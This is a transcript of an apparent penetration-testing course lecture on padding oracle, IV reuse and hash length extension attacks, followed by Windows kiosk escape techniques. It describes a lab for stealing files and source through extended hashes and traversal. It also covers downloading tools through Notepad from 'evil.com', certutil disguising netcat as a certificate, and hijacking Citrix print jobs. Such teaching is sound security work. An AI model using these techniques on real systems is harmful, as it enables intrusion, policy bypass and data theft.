Now that we have that, we can switch this and do the last two bytes. Because now that we know this, we can decide, well, let's make this last byte then a 0-2, and let's work on the next byte. It's a lot like when you just brute force through a combination lock and you just move the dial on this lock and you're just trying the same numbers over and over again. Eventually, we will get through it. Okay? Well, do we need to walk through that anymore? Is everybody pretty clear on that? I don't know this gray, hex 5C. I don't know 5D, but I can discover 5D by doing the one thing that ends up with a not padding error. It happens to be 5D in this case. And I know that that must be 5C. Once I know that, I can go through and change this for 0-2, work this one, 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 all the way back. Then I've got the last 8 bytes of the key stream, and I can work back on other blocks as well. Again, we don't really care about what it's decrypting yet, but we're using this process to find the key so we can decrypt something we do care about. Once we have the resulting key that's used, we can decrypt anything we want. And that's Oracle padding. Okay? It all comes down to the fact that it's XOR. It's completely reversible. We get that keystream byte. Don't care about how it got there, but that's the one we can use to reproduce what we had. Moving again down, we end up with this one. We keep brute forcing the second. Once we accommodate, we change it to a padding of 2. We know that. We can do this math because we knew what this was. We came up with 5C, right? So we know we have to have a 5E to end up with 2. There's only one possible byte that will give us a non-padding error with this being a 2 in this second to the last position, right? So we should keep working right to left till we recover all 8 bytes. Make sense? All right. And that's the idea of a padding Oracle attack. Real world situation. This was one that was branded the Poodle attack because it also involved downgrading to SSL version 3 because SSL version 3 would do what we say here. It decrypts, then checks the padding, and then handles the rest of the application and authentication and stuff. So with SSL version 3, we could use that difference in error message to do that. We'd have to be in the middle of an application, so it was already logged in, something like Burp or a different proxy tool would work, and then we can inject or change the HTTP JavaScript to make additional web requests, and then that would actually be the way we'd make multiple attempts. All right, so the similar thing as before, but first we'd have to walk through our ciphers that are supported, get all the way down to SSL version 3, and then we can do this attack, basically keep making extra requests. And what this would do would be moving the legitimate blocks to the end so we can work on the padding bytes is basically the part of this process. And since this requires a JavaScript request for each attempt, this can take a while. It's very noisy, very, very hackish. You have to build in pauses for JavaScript to check things because it does check, you know, if you make an HTTP request with JavaScript, you have to check the timing to see if it's done. And so actually having this in reality is something you can play with if you have to demonstrate the attack technique to somebody. Like maybe you're saying, it looks like we have an Oracle padding problem. Here, let me show you here how it would work. You may use demonstration-wise this. It's just kind of, again, hackish. You have to worry about the timing. It takes a lot of effort. I would recommend not just using writing your own, but you could use the Poodle attack from Thomas Patsky here. Basically, if you set up his utility and go grab like an old Firefox portable version, it's probably the best way to do this, and you can demonstrate the attack very easily. Or grab an older VM that has an older, you know, Firefox version that was still vulnerable. It was patched at the time, but I will say that Microsoft's solution was remove the setting that allowed SSL version 3 in Internet Explorer. Somebody might turn it back on. but they didn't actually patch it. It's still a problem. They just disabled SSL3 part of the downgrade. They didn't fix that it could actually still have a padding oracle. But anyway, you can play with that if you like. A lot of noise. Sometimes it's only useful if you're fighting with a developer and say, no, seriously, here's how that works in a different application. Forget about yours for a minute. Let's look at how other people discovered this. I find that a lot of times, especially working with developers, it's easier to say, look, forget about your baby for a second. Let's go look at this other thing that somebody made a mistake with. And then they don't get so defensive. So I like demonstrating with this sometimes. That's our Oracle padding. Kind of a neat thing to keep in mind that, wow, even if we just get an error message, that can lead us to a lot of informative things, even if we don't actually have anything literal printed out in the message. We might be able to tell a lot about those error messages. And we'll circle back to that with some of the post-exploitation stuff later today, the usefulness of error messages that don't even tell you what's actually wrong. There's still some stuff we can learn. StreamCypher, IV reuse attack. This is, we've mentioned at the very beginning, we start reusing those initialization vectors and we see duplicate plain text, because with a duplicate IV, you really have a duplicate key. And so we have duplicate keys in this situation. So if we have these colliding IVs, whether or not it's a network protocol or some other thing that the StreamCypher is encrypting, it's pretty easy for us to come up with a situation that resets those IVs, right? Either it's in the clear or there is that one way to predetermine it. And like we were saying, what happens when the device resets or when an application starts? What is its first IV? It's got to say that in the clear, or it has to start from zero or something. If we have short IVs, I can just brute force this forever and eventually collide with a one that wasn't rotated. It's going to be easier to do when it's short. If it's static initial, like really the initial IV, which, yes, the initial initialization vector, if it's all zeros when it resets, it's a lot easier for us to go through and find that duplicate. Again, example-wise, if the key, because the IV is the same, the key is the same, we can see those duplicate pieces of information. So let's look at an example. We see some of our traffic here, just very small packets. We see some patterns. You may not see it immediately, but packet 5, packet 1 have the exact same bytes. So whatever this data is, it's repeated. We can, once we know what it is in one example, we can use that resulted known plain text, known ciphertext combination to fill in any missing gap. Because of that reversibility of XOR, the commutative property, we can XOR it back. So if we knew exactly when this thing's first powered up, or I first log in, I get that byte sequence, I know what that means. Whatever that means, I can have that result, and I get the key stream at least for the length of that thing. If this is just a very short message that's a known plain text, known ciphertext, and I reverse that back to the keystream using my XOR here, I only get that length. I would have to try to find something longer to get the keystream for something, if I want to decrypt something even longer than what I had as a known text. Okay? If you're going to do this, there's a few ways. We can look at the PowerShell way when we look at Empire later today, but one particular Python implementation we could use, just a simple having our tuples of our bytes that we're XORing. We have our carats to do our XORing. We even print it out in a nice little hex way to do our XORing back. All you need to do, copy and paste the things that you know into the corresponding tuple and run your script. Now, in practice, we were picking on WEP earlier, but this is still a problem with other protocols. The IV reuse and WPA is really bad. Again, not just WPA, but the way WPA was implemented is what we're talking about. The question of what do we do when we first start something up is a big question. The basically Android being Linux, the WPA supplicant utility that negotiates and a session key is going to have to start somewhere with an IV. And so Android starts with zeros. It actually doesn't save when you restart it where it left off, so it's always going to start at zero. If we force that to restart over and over again, we can force it to start with an IV of zero. And we have that, again, because the IV is the same, it really is the same key, and therefore we can reverse that. So the first four pieces of the WPA authentication, whether it's pre-shared key or there's some other EAP type involved, you have certificates, you have some other representation where it goes to radio server and make sure that the device is authenticated, allowed to be on the network, it still would let you go back and decrypt from this point. So just to prove that, that's the crack attack, a little bit more of a modern approach to the same ideas we've been talking about, but for WPA2, not just the old WEP thing we were picking on. Okay? So we have that. You can walk through forcing the collision. We can do that. It's not just Android. Android was just the easiest one to pick on at the moment, but it is basically a problem for anything that had the basic supplicant, WPA1. All right. The next thing we're going to talk about, even though it's not pure reversible encryption, it is using some crypto methods, and so we find that this is useful in applications that do something like an authorization check when there is a password or some other secret that is used to make sure things are okay. So let's just dive in and look at an example application. Let's say we've got something where to prove that we're okay, we have our web request, our web app is going to give us, after we've logged in, after we have our permission, it's going to give us a link that proves that we're allowed to do the thing we're trying to do. In this example, we're trying to download a file, and the web app tells us what to do. Hey, when you come back and click on this link to download the file, give me back this hash, and that's how I know you're able to download that. All right? It's not just a session that's protecting our permissions, but we have this hash calculated. So not that uncommon. This is specifically something that happened with both Tumblr and Flickr had the same issue with protecting images that were supposed to be private. We have a website. We have an application URL resource to the arguments, a file, and a hash. The hash represents, here I'm proving that I can access that file. You told me, app, to submit this. Again, you wouldn't type this in as a user. This is just the link you click on. All right? So we have that. What's happening on the web side of things in this example? Well, it's taking something. In this case, it's literally secret value with exclamation points in it. That string, concatenated with the file. And if that hash that you submitted doesn't actually add up to what it calculates an MD5 hash should be for that request, then, haha, the secret value you didn't know about, you obviously didn't get the hash from me because you would have had the right hash because I generated that when I made the link. The application is the one that would have generated that. And so we can catch that error and deal with it as necessary. If it does match, though, we can just print out that file. Okay? So if we have this, we are likely able to use our hash length extension attack. The problem people have with this attack is it is a little confusing until you understand how hashes are started, how they're generated, and they're not all the same. As I said before, similarly here, vendors will tend to tweak this a little bit and make it a little weird. It doesn't quite match up, so you might have to fiddle with it a little bit. But I find the more that developers just use libraries that say, just give me the SHA-1 hash, you don't have that problem. As far as an attacker, we're not going to have that problem. The key thing with this hash length extension attack is it's literally in the name of the attack. We're taking a valid hash and we're extending it. As an attacker, we don't care necessarily what that secret is. We're not cracking it or anything. We're just taking a valid hash, adding more stuff to it, and that's how hashing actually works, right? If you take a file and you take an MD5 or SHA-1 hash of it, it doesn't matter how much content it is, you always get the same size of a hash, right? It's always going to result in that because of how it cycles through blocks of data, going through a little bit of a of an algorithm. If we pull up the RFC, for example, I think I have that somewhere. Yeah, I was double checking something earlier today. So I just pulled up the MD5 RFC. Was it 1132, I believe? 1321. I'm not really dyslexic, but I just got the numbers mixed up. You know, you can read up and see how this actually does it. Here I have shown a couple of things. This is what it's initialized to by example, but you can see what math it does, the cyclic math it uses on the data. Whatever data we're hashing, it takes the first 8 bytes and does some math. We have ands and ors, and we have XORs, but it's always the same stuff it does. And then it basically uses these as registers. Don't confuse them with CPU registers. These are algorithmic registers. They're just little, like a variable, you'd say, if you're a programmer. Call them registers because they're mathematicians. But they're variables. Okay? And we just save that as we eat up that data and go through the data to create the hash. That's what happens. So, keep that in mind. You could go up and you find a new, different algorithm. You can go and see exactly how this is working. We have a few diagrams in the slides with some arrows, but how do you get to that point? Well, you go look up the RFC and say, how does it actually do this? So, with that in mind, how can we extend, like, we're an attacker, we have access, we see a file and a hash that are legitimate, like we have a demo account, or we have a public thing, and we can see it, we can take that valid hash and extend it. If we can find something else we want to download than this public.pdf, and we can extend a valid hash, we can probably get there. There's still a few variables that we have to deal with. It's kind of like solving a math equation where you have more than one variable. We might have to do a lot of trial and error, but we can get there. Okay? Here we have a couple of things going on. We have those initial registers. This particular one is for MD5. In that RFC, if you scroll up, here in step two, that is how the algorithm starts. Those registers, those variables start with these values. As the math happens and it hashes through these things, these first 8 blocks and a few other operations, I said ands and ors and XORs, it saves the result of that hash in the registers for the next iteration through this algorithm. And we just, that's why we extend it. We take something valid and we just keep adding to it. In this example, again, we don't know that it says that there's a secret named bang, secret bang. We just can infer it. The real thing, though, is I do have to know or guess the length of that, though. Otherwise, I can't do the math on the registers, the content of the registers, I should say. I'll get off on that. So I do have to know the length or try every possible length of that secret. You can look at it this way. To exploit it, normally this is what's happening. We have the secret. We have the name of the file. Server has its own padding. And then what do I do is to attack? Well, I take that valid hash, add my own padding, and if I keep adding padding, I can get a hash that also represents the thing I want. And if I'm smart about adding padding, I can add padding in the application that's neutral. Like if we're looking at a website, I can add in maybe null bytes, dots, slash slashes, and they're effectively going to give me the same thing, right? I can use that to change values and end up with something I do want. As long as I know the file name of what I want, I can add stuff that's not going to matter so much to eventually extend that hash to something that does match what I would like. All right? That's where we're getting at. You can look at a few things. Here's one example. Ron Bose wrote the tool we're looking at, Hash Extender. He did it in basically trying to tie together things. He had seen a few CTF challenges where this was I don't know, it's kind of formulaic. He saw this, he's like, this is just like a previous challenge. How did these people solve it? And he kept looking at that and noticed some patterns. And he asked himself, why isn't there a tool to do hash length extension attacks? Everyone does it by hand. So he came up with this tool. It's pretty handy because it handles things like doing the padding of web app safe bytes. Here we have null bytes added as padding, and it does account for other ideas. Here, basically, we're extending a valid hash that we have, the S, here, that argument, and the destination file we have with the D command line option. And if we want to really access something else, we give it the minus A argument, and here we have a couple of slash dot dots, and of course your web app is going to treat the previous thing as a no operation, as nothing, if we undo it with the parent directory thing, right? So basically this is going to look like we're asking for 2.txt and then a whole bunch of null bytes, the right amount so that we can collide with the valid one we want, which is going to be slash dot dot slash dot dot with this 2FEE2E. That's a slash dot dot. And then our HTTP password is the access. This gets piped right into that MD5 call and ends up with a valid hash as if it were legitimate. And then here we see in the screenshot, what does it access? Well, this padding is implemented as some kind of garbage, but it's treated as a fake directory. And it goes back over that with the dot dot, with one of the dot dot slashes anyway. Make sense? Seen that in some of our web apps where we can get away with that. So it's a couple of things we've got going for us. The fact that we can submit something that has padding, as well as we're extending something that's legitimate. Okay? So first of all, to make the tool work, we're going to have to know what kind of hash it is. Fortunately, it's a lot easier to see what kind of a hash it is just by pure size than it is for something like block mode encryption. There might be a couple of guesses we'll have to try. Again, as I said, there's a couple of variables here. This is one of them. But you're usually pretty safe. MD5 and SHA-1 are the most common. Might be something else. We have an exercise coming up where we'll do that. Introduce it, turn you loose. I'll actually demonstrate it at the end because I find that it makes more sense as you fight through it a little bit. You get that to that little level where you're like, okay, now I understand. So we've got like 3 or 4 different variables you're playing with here. You need to fight with it a little bit before we look at the actual answer. So for this scenario, looking at a website, you're going to try to use a demo account, gives you some kind of access. You're going to download the private files instead of that one. And for extra credit here, you can actually steal the application because it is a PHP application. You can steal the PHP files once you figure out how to use hash length extender, and then you can get the source code of this particular application. So it's not in the book written that way, but have some fun stealing the web app itself. We had to have something to download. It happens to be a royalty-free anime website. You're going to go in and see these little clips, and you're going to steal one. So based on what we've seen so far, I challenge you to just dive in, play around with it a little bit. Let's pause where you're at for just a moment. I wanted to challenge you to try to fight your way through it. A lot of advanced penetration testing is fighting your way through command line options. So, and again, we'll talk about that a little bit more with unknown applications later. But we already told you which tools to use, and just to tie some of that together, I just copy and pasted the URL of one of those destinations, logged on as a demo account, had this access, grabbed the URL, and then I used the hash ID utility. I couldn't even remember what to type. I had to tab complete it, and there we go. It tells us probably SHA-1, and we see some other options. But let's go with SHA-1 initially, as well as with the tool itself, the hash length extension utility. You can just run it without any command line options. You see some arguments. See a few things that come in handy. D for the data that you know. S for the signature that you know. A for the one that you want, the data to append. And the hash format. If you don't specify the hash format, it will send, basically say, well, if it's this hash, it's this one. If it's that hash, it's that one. It will tell you all the possible ones. But what I'll start doing is I'll start adding SHA-1 because, well, I suspect since I almost always only see that one when it comes to these options, that's what I expect it is, just to kind of limit the things I'm typing. But we do have a few things we could try, for example, just to kind of, again, make this a little more organic. You were finding this on your website, what would you do? I would do something like this particular example I have at the bottom of the screen. I'm going to extend one. The one that I looked at, I actually made a typo on. I see that now, that there's a missing 4. There we go. On the file name, original one, the data that was hashed, S for the signature, that hash that I had, and then here I added some command line options that I saw just by looking at the tool. It wasn't in the book, but I added the secret minimum and secret maximum. I said, I'm guessing between 6 and 10 characters for the secret. It's a guess, and it's going to print out 1. Here I didn't even specify the SHA-1 hash, so this is all for the different kinds of hashes. You see SHA, SHA-1, RIPE, MD-160. It's giving you all those guesses for the different lengths. So each hash for each possible length. And it's not too hard to see how you could re-implement something like this hash extender tool, which has been also done as a burp plugin now. And you can try to use it in some other form. Like, hey, let's just brute force, try every possible hashing algorithm, try every possible guess of the length and get there. Or you can copy and paste it like we're doing here. I did a minimum and a maximum. It's just as if I ran the tool with the minus L option multiple times. But, as I said, this experimentation and finding your way makes a lot more sense once you get there. What I do have here is also an assumption that I'm looking for space hijackers long.mp4. That's that other variable we're trying, which we're not sure of. We don't know what the file name is we're trying to steal because we didn't steal it. How might you know what the legitimate one is? Be a good guesser, or two, actually buy one, and then you might know more about the naming structure. Maybe it's in a different directory. You know, those kinds of questions that would vary between applications, you can ask by looking at a legitimate one and going from there. All right, so there's, in the real world, a lot of different contexts that might lead us to what that is. Now, I do want to say, if I get this wrong, what am I going to see? I'm going to see not a hashing error, a permission denied error. I'm going to see a file not found error. I'm going to get a 0-byte file in this particular application because I had everything else right, but I guessed the file name wrong. The file doesn't exist. But I was okay to download a file that doesn't exist. That's just the way you interpret that. I didn't have an incorrect hash error message. I had a correct hash. So that's what most of us have the hardest time with, is guessing the right actual file name, or in the real world, this is still also could be a different path. It's not always in the same directory, and so it could be a path and file name. All right, so play with those settings. You've got not this hash you're playing with. This hash goes with that original data, right? That's the same. We know those are the only thing we know, really. The rest, we're guessing it's SHA-1, we're guessing the length of the secret, we're guessing the file name. So yes, you'll have to try a few times. All right. You get the right answer, you'll get the full video. I'm going to let you have another 10 minutes to finish this up, but I wanted to tie that together a little bit after you were forced to try to figure it out on your own. I find that it sinks in a little better if we try a little first. But continue, please. I feel like I'm Columbo or something. One more thing. the thing I don't have on the screen that comes in handy is the output in HTML command line option, so that the null bytes are in a way you can copy and paste friendly into the browser. So you might want to add that option if you're typing exactly what you see on the screen. Also, too, I am a bad guesser on the file name. Okay, I'm just going to mention a few things. If you didn't get a chance, as always, to finish that exercise, that's what the extended hours are for, catching up on things. But I wanted to highlight a few things. I already mentioned it, but just to draw your attention again. Here in this example we've got on 84, this is a getting to the answer. It's always a challenge in a course like this where it's things you have to try to get to the solution to show you something that's a partial credit, even if you didn't know that, even though it's not giving you the right answer, you're still almost there. Remember we had multiple variables we were trying to solve for here? We got the length right. We guessed a file name. We got the length right. We got the SHA-1 part right so far. This exact answer that we have here is going to give you a zero-byte file, though, because the hash is correct for the file name supplied, but it won't actually be able to read a file. And your application may be different. Maybe that's not how it behaves that you're looking at. It's a guess. Again, also, too, the application may be perfectly fine accepting these null bytes that we're using for padding that the tool's doing for us, and may or may not observe something like a web URL that can take a slash dot dot. And technically, it's not a directory traversal vulnerability. It's a hash length extension vulnerability. The things about this vulnerability, too, but before I get there, I guess I should say, again, stress, we still have the file name wrong here, right? And we can get a little lazy and add extra slash dot dots, or maybe we can do something else to better improve our chances, like guessing the length in a range. Some of you noticed, too, that if you don't add the out data format HTML, you don't get these as percent zeros. You get them as literal null bytes, which you might want for a binary application, but they're harder to copy and paste than what we have here. So I wanted to highlight that real quickly. Again, you would get that zero-byte file because everything except for the file system accepted all those things. File system wasn't able to give you a file that didn't exist, so you got a zero-byte file. Application may catch that and give you a different error. This one just gave you a zero-byte file. Come up with the correct name in the correct location would give you this. Now, to change what's on the slide here on 87 to steal the same access PHP that's getting interpreted to give you this file, all you have to do is use the hash length extender tool for a destination, the add-on, change that minus A file to slash dot dot slash access.php because it's one directory in from where anime files are saved. And if you tried to go further with more directories, you got that error message the application was looking for more than two slash dot dots, which if you steal the access.php, you can see. And it was catching it. But, you know, if you want a further challenge, you can use some forms of Unicode strings to get around that detection of slash dot dots. So you can actually steal everything off of this server if you find out a combination that works. I don't remember off the top of my head, but I've seen it done. I just don't show people that because I don't want to be distracted from the other awesome things we're doing today. There was one other thing I wanted to mention. I don't remember. Now I remember. What do we do about it? The vulnerability is what I started to talk about. You know, the vulnerability is the fact that we're using an MD5 of a secret and a file name in this example. So this class of vulnerabilities, hash length extension vulnerabilities, exist anytime we have a secret like that and we're using a if we're using a keyed hashing algorithm like MD5, SHA-1, and a secret is at the beginning, all we have to do is guess the length of that secret and we can extend it the same way we've done. If the secret is at the end, we can't do it exactly the same way. We can still do it if we account for some length issues, but this tool won't work for us. You'd have to, on special situations and conditions, you'd have to modify it a little bit, and you could get there maybe, but I haven't been able to do it in the real world. Question comes up of real world situations. We mentioned Flickr. I mentioned other special applications. So you might run into a custom thing that checks a hash proving that something's legitimate. If you're checking, well, it could be anything. Maybe you have signed documents. You're using just hashes to sign things. You could use some technique like this to extend a valid hash to another one. Of course, it would look a little funny having a bunch of padding, possibly, depending upon what padding options you had, but fundamentally, it's still the same flaw. The other thing, as I mentioned, keyed hashing algorithms behave differently than others. The best answer to how you prevent this problem is to use a proper HMAC instead of an MD5 or SHA-1. Have a MD or SHA-HMAC style function call. And there's a couple of cycles that go through, so you can't just extend it, basically, is what I'm saying. All right, so those are your two corrective options. Quick and dirty, enough that breaks the common use of the tool, is to just put the hash at the end, but you're better off doing a proper HMAC that can't be just extended. All right? So that brings us to the end of the focus on crypto, mostly for today. And we're going to dive into a little bit more of a visual kind of a thing. Switching gears dramatically here. Initially, first, we're going to do a lot of visual things. Found that it was pretty good, especially in the afternoon, to wake up a little bit more with some different brain activity. We're going to look at, it's kind of like a five-year-old looking at images or something. We're going to be able to look at pictures, right? A different kind of brain activity here. But the goal is really to try to look at a situation and ask ourselves, all right, there's not something that I can just run an exploit for a known vulnerability. We're going to look at a situation where you have some form of access, and what can you do with that? Kind of like a living off the land situation. You know, that's what we're looking for. What can we abuse? Not just what hasn't been patched, but what can we do with what access we have? That's really the overall access today. That's basically our overall theme. Even though we focused on crypto so much in the morning, that's our main goal, is what can we abuse based on what we're seeing. So we're going to talk about some very quickly, scratching the surface of some of the potential things we might be able to look for. And basically, under objectives here, it could be anything. It can be a normal desktop that's just hardened. But definitely the kinds of things we're talking about are those kiosks, something where things have been removed, special purpose computing devices perhaps. What can we do to abuse that device and get a better foothold than the one that we have? Okay, so that's our goal. We'll also tie in some PowerShell and stuff later, but that's really our overall goal. We'll cycle back later, although we're focused on Windows at the moment. We'll come back around to a more general escape and escalate, tie together even some of the things you did this morning later today as well. Okay, so let's look at the situation. Let's say we've got some kind of a desktop access. Maybe we did exploit a web app, and we have a restricted shell environment of some kind. We're stuck in a Chroot environment or a proper jail, a container. There might be some file system that's shared with something else, but you're in an isolated environment of some kind. Or maybe you were able to walk up to the kiosk no one was using that is there for hospitality reasons. Not necessarily the ones here in this facility. Please don't just go try to do this on the ones in this facility, you're not authorized, right, to penetration test the border pass, the boarding pass printer type stuff. Just do what those devices are intended to do and you probably won't get in trouble. Tempting, but don't do that. That's the kind of thing, though, if you are hired to assess that we're talking about. Our goals are to get out of those restrictions. We're in a restricted kiosk. We can only do certain things. We can print off things from certain websites, maybe. Maybe we can only open up certain kinds of documents. Only Word is installed, or a web browser is the only thing there, for example. Then what can we do with that foothold? Can we get a better foothold? How do we do that? And maybe it's not just a kiosk. Maybe it's just a restricted desktop. Like literally it's hardened so much, we have a hard time getting a better foothold. So we might need to do some lateral movement. We might need to find where can we use what we have somewhere else as well. So first, let's kind of give us some more context on the kind of situation. Let's say we're on a Windows environment and we have enterprise Windows infrastructure helping us manage it. And that's the situation we find ourselves in as the attacker. We can walk up to a device unattended. And what can we do with that? Or we're given a guest access on a kiosk in the same environment, but still managed with Windows Enterprise, what would it look like? Well, The GPOs, the group policy objects, are how Windows infrastructure manages things in groups enterprise-wide. So we can, as a defender, remove things from the desktop. We can change visual access and remove things from the control panel. You can't see, network settings, or you can't see my computer on the desktop or whatever. We can control all those locally, but on enterprise-wide, we do it with a group policy object. Those are actually done, serialized, replicated between domain controllers, and when workstations log in, they get the ones that need to be applied to their group membership, and that's how that gets implemented. So there's thousands upon thousands of settings that might be in group policy. And we're going to look at a few things we can do with that, but I can do stuff with specific Microsoft software, not just the desktop itself. Like I can force your web browser to go through a proxy with a group policy, right? I can force, I can disable right clicks in Explorer. I can disable the task manager. I can disable the privilege to schedule jobs. You know, I can disable a lot of those things. And as an attacker, we want to go through and say, what kinds of things can we abuse? What are we still allowed to do that we can abuse? Now, applications themselves might be allowed or blocked via software restriction policies, or more modern Windows calls it App Locker or Windows Defender Application Guard. If you use it on the latest version of Windows 10, that's what it's called, Windows Defender Application Guard. The original SRPs were used up until the last version that used them before it was called App Locker was XP and Server 2003. But App Locker didn't really come into play until Windows 7 Enterprise. So if it was Windows 7 Pro and part of the domain, technically it was still a software restriction policy. But it would take the form of a rule that would say this application is allowed or not allowed. It would identify the application by file name, this path, this last option we have here, which is pretty easy to circumvent. We can just copy that application or bring our own to a different location and we can run it. It would only, by blocked, /C:\Windows\System32\CMD.exe, if I block that on purpose with an SRP as an administrator, all you have to do is copy that file. The SRP just says you can't execute it. You can copy it to your desktop. Now it's not that file anymore, right? It's a new file. So that was a pretty silly one to get around. And I could bring my own CMD, my own command shell if I wanted. And it also doesn't prevent me from doing another application that has a similar function. Like I could run the old command.com. It's not going to prevent me from doing that. I could run PowerShell.exe. I could run multiple different PowerShell exes and still get a command prompts. So sometimes you have to ask yourself as an attacker, is there another tool that's a good alternative? Instead of what's being blocked, what can I do? The zone was also a pretty trivial one to bypass. When you download a file with your web browser, it's going to use an alternative data stream in your NTFS file system to save a flag that represents what zone that your browser has defined where you download it from, an intranet site. Of course, to use that, you would actually have to have intranet sites defined, and many of us have that, not all of us, in our enterprise. But you can still tamper with that. It was on the file, an alternative data stream. You could do this many different ways, edit it, or just copy it to something that didn't support the alternative data streams, and it's gone. You can even, on Windows 7 and later, Service Pack 1, you can right-click on the file, and there is a checkbox if there's a trusted zone.identifier in there, setting it all, even if it's untrusted, you can uncheck that checkbox and it deletes the value. And by right-click properties and unclicked that mark of the web, it won't show that it's there. That checkbox labeled unblock. You can check the unblocked and it won't match these rules anymore. The ones that are harder to reproduce and work around, it was the hash. Now, this first one in SRPs was a cryptographic-ish checksum, pretty hard to get around changing that. if there's a fingerprint that disallowed a certain application, like maybe your enterprise had a hard time with people running StarCraft when it came out, running games on their network, they could add an SRP that disallowed the use of the hash of the StarCraft.exe that was the current version, and then no one could run that one. They'd have to run an old version or some other game. That's one thing that might happen. It's a little harder to get around. You just have to use a different application if you were trying to get around that problem, right? Another one we can allow or deny on is software publisher certificate. This one I don't see done as often because it's just we're not used to managing that. You have third-party software you need to run, like maybe you're a medical office. You have electronic medical record system. You could say anything signed by those developers, go ahead and allow it to run. I need that application, and you can make sure that it's running. The problem really is trying to deny things based on that certificate. It's getting a little more practical than it used to be historically. Like some of the settings on modern Windows 10 will, you can do several of them. One of them is, again, App Locker, not SRP specifically, that only run Microsoft signed applications and applications, from Microsoft's App Store because they happen to be signed and trusted by Microsoft, even if they're not signed with the same key as the Microsoft in-house applications. So it's getting better on the certificate, but what if I did something like trust everything Microsoft signed? Well, what has Microsoft signed? A lot of things. Command.com, you know, the tool that undoes the software restriction policies. You know, there's a lot of things that Microsoft has written. I can't just say all of the things Microsoft has written is allowed. That would be a lot of things. I don't necessarily want, you know, games, lots of other things could be used evilly. So not as useful classically. Once we move to AppLocker, a little more practical, we get some of those more advanced features I talked about. The audit-only mode is really, really valuable, though. We can say, you know what? I think I'm going to be able to lock this down, but let's try it out. And that way it only logs, hey, this would have been blocked, but audit-only mode is turned on. It was not blocked. It would just log it as if it was blocked, though. Go through that log and see, was this legitimate? Oh, yeah, we forgot about that other application that this one group needs or whatever before you start enforcing it. So real world, this actually works. Audit-only mode, very useful. You can also use it for other things like logging. And if you do audit-only mode, for example, on something like blocking old versions of Adobe Reader, and only the new version is the version you're supposed to have, you can catch those old versions and find out why they aren't getting up to date. There's other restrictions you might encounter. I see a lot of ones that we focus on today, a virtual application kind of a concept. The idea of presenting an application to a user, but hiding the fact that it's running inside of a different machine. Like a remote desktop, but only for an application. Microsoft had theirs called Remote App. And they recently discontinued doing this in Azure. They had their own Azure-hosted way of doing this, but they deprecated that feature and said, you should stick with Citrix. Citrix has probably the best remote desktop and application support. That was what Microsoft came up with. I don't necessarily agree with that. They definitely have a lot of good access there, although I will say that there's a lot of things about Citrix remote apps that can be manipulated. My personal favorite is if you ever can connect with a machine that's named the same as a machine in Citrix and you name your printer the same, if you're the more recent person to connect, you get all the print jobs. And that was my favorite, just based on the name. The way it does things, if it's finds a machine that's not in Active Directory, I can just bring a machine not in Active Directory, then it's just Windows name stuff to sort all that out. And I can just find out what the CFO's printer is named. If I find that out, then I can get all his print jobs. It's pretty hilarious, actually, to me. Found that one by accident once. Used it twice in two different pen tests. But anyway, that kind of an application I'm talking about. VMware has theirs. Was called View, and they named it Horizon. And there's probably been a few other names in between somewhere. They like to change names on their products quite a bit. But it's basically the same concept. Present somebody an application, and behind that is a full virtual machine, Whereas if we're just getting an application as a normal user and something bad happens to the application, it's really happening somewhere else, right? If it's in memory of a virtual machine, I can't break out of that memory directly and affect the other applications on that machine, is the theory anyway. So we have that. Microsoft called theirs remote app as one word. But again, they still have it. They just don't support it in Azure anymore for that functionality. I was just working through some options on that with somebody this last week, actually. But that's the kind of situation we find ourselves in. And just as another example of other third-party ones, the last one I did a nice penetration test on was one called WatchDocs. It was actually for a group of lawyers that wanted an assessment and say, how secure is this data loss prevention utility? And that's basically what it would be. A few things. One of them was an Office plugin, Microsoft Office plugin. The idea was you couldn't open up their documents unless you had their Office plugin. The Office plugin would let you edit there, disable the clipboard, do some other things. But if you didn't use it in one of those restricted environments, it would open up a VM in Citrix on a Server 2003 machine still that would have Office served to you. And they would hide the rest of the desktop and only give you that one application. And that was the idea. They could protect it if it was running inside of a VM. But of course they couldn't. Spoiler, it wasn't good enough. We still were able to exfiltrate data. And that's the kind of thing we're talking about. Now, for kiosks, we might have anything that would give you a different desktop. Our desktop on Windows, what is it? Like literally, our desktop, the first copy of Explorer.exe in your session, your login session, is your desktop. The first Explorer.exe process is your desktop. If you have any more than one, it's probably just the file browsing dialog, that Explorer. But the first process you have is your desktop. So if we replace that with a custom exe, like sitekiosk.exe, then we're not getting the start button or the rest of the window isms. We're just getting that other desktop. So it could be many things. I tend to see site kiosk the most. So what do we do? Well, we can treat some milestones as progress here. If I can get a command shell of any kind, then I can type commands, basic steps here. Little Captain Obvious there that I can type commands if I get a command shell. But maybe one of the shells is blocked or one of them has different access. Sometimes you can do some things easier than others, so it's nice to be able to see, can I get a raw command shell? Don't forget about the old command.com. Not great, but I can still type some things. And it's nice to be able to get access to Notepad also. If I have access to Notepad, it's not just that I can type scripts into Notepad, but I can use Notepad to transfer files. I can download with Notepad. And really, this is a function of shell32.dll in Windows. If you can do any file open dialog, I should say most. I haven't run into one I haven't been able to. Any file open dialog, I can put a URL in there that says, go to this website and download those contents. I can file open in Notepad, http://evil.com/some script. And it will download it and put it in Notepad, and I hit file save, and now it's saved to the file. And I was able to download something even if a web browser was blocked. But if I can get a web browser open, then I have a little more flexibility and, easier to download binary data, which I can do with Notepad. I could Base64 encode it, download it with Notepad, and then Base64 decode it to download binary. But it's kind of not as easy. I like having an Internet Explorer or some other Internet browser open. I also get a chance to review proxy settings and other things that you can't always see as easily if you don't have that. So these are milestones. You get a command shell, get something like Notepad open, and get a web browser. You've got all the building blocks you need to completely own the device at this point. Some of the things I mentioned, Base64 encoding. Here's some PowerShell that makes some arbitrary tool in binary look like a certificate, and that's what certutil.exe is good at, dealing with certificates. So we use its decode feature to take. Maybe we use Notepad to transfer that nc.txt, and it will take all that base 64 encoded binary stuff, strip off these begin and end certificate lines. Those actually don't matter. But the point was to make it look like a certificate for network traffic reasons. It's going to look normal. Someone's not going to look at that network traffic and say, oh, wait, this base 64, that must be evil. If it says certificate stuff on it, it's going to look just like any other certificate that's been requested across the network. So great, let's do that. Decode's going to ignore those, give us just that, give us an EXE. But, you know, I don't have to use Notepad even. CertUtil does have a URL download. Basically, we can download it and peel it out of the cache. We split it out, and it will save it as well. So we could use CertUtil completely, one to download the last line, and the line above that to actually convert it back to binary. Now we can transfer binary. Or we could use Paint, Microsoft Paint. If we can run Paint in the environment, just like Notepad, when we do a file open dialog, I can give it something. Paint's going to give me an error message saying, that's not a PNG or a bitmap or anything I know how to process. And it'll, in the error message, we'll have a big long line of where in the internet cache history file directory is that file. You go rename it, and now your binary is downloaded. So there's lots of things you can do with those. I'm biting my 